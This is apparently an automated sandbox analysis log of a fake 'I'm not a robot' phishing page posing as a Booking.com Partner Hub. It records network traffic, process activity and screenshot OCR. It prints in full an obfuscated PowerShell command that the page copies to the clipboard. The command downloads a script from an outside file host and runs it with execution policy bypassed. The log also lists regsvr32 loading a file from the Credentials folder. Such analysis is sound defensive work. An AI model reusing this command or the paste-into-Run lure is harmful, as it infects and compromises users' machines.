        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /cj06ld.txt HTTP/1.1host: files.catbox.moeaccept: */*accept-encoding: identityif-unmodified-since: Tue, 27 May 2025 17:01:28 GMTuser-agent: Microsoft BITS/7.8
        Source: global trafficDNS traffic detected: DNS query: confirm-id2719.click
        Source: global trafficDNS traffic detected: DNS query: partner.booking.com
        Source: global trafficDNS traffic detected: DNS query: bstatic.com
        Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
        Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
        Source: global trafficDNS traffic detected: DNS query: try.abtasty.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
        Source: unknownHTTP traffic detected: POST /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://confirm-id2719.clickSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: classification engineClassification label: mal84.phis.evad.win@29/11@23/214
        Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\BIT8664.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yirvsiyf.smg.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
        Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        barindex
        Obfuscated command line found
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

        Persistence and Installation Behavior

        barindex
        Detect drive by download via clipboard copy & paste
        Source: screenshotOCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. '.psl I)" 0K to complete verification" v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. nsfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj061d.txt') (Senv v Open: 0K 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C Undo 2. Press CTRL + V Cut 3. Press Enter Copy Paste Delete Select All Right to left Reading order Run Show Unicode control characters Insert Unicode control character Type the nam resource, and open IME Reconversion Open: 09:20 ENG p Type here to search SG 29/05/2025
        Source: screenshotOCR Text: e about:blank -8 Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. shell -nop h -e b ass -c "Stat-BitsTransfer Open: 09:20 ENG p Type here to search SG 29/05/2025
        Source: Chrome DOM: 0.2OCR Text: Robot or human ? Check the box to confllm that you're human. Thank You! I'm not a robot Privacy - 'Tenn.: Verification Steps 1. Press Windows Button 'C 2. Press CTRL + V 3. Press Enter
        Source: screenshotOCR Text: -8 about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter x Run nl>l Type the e of a program, folder, document or Internet resource, and Windows will open It for you. Open: 09:20 ENG p Type here to search SG 29/05/2025
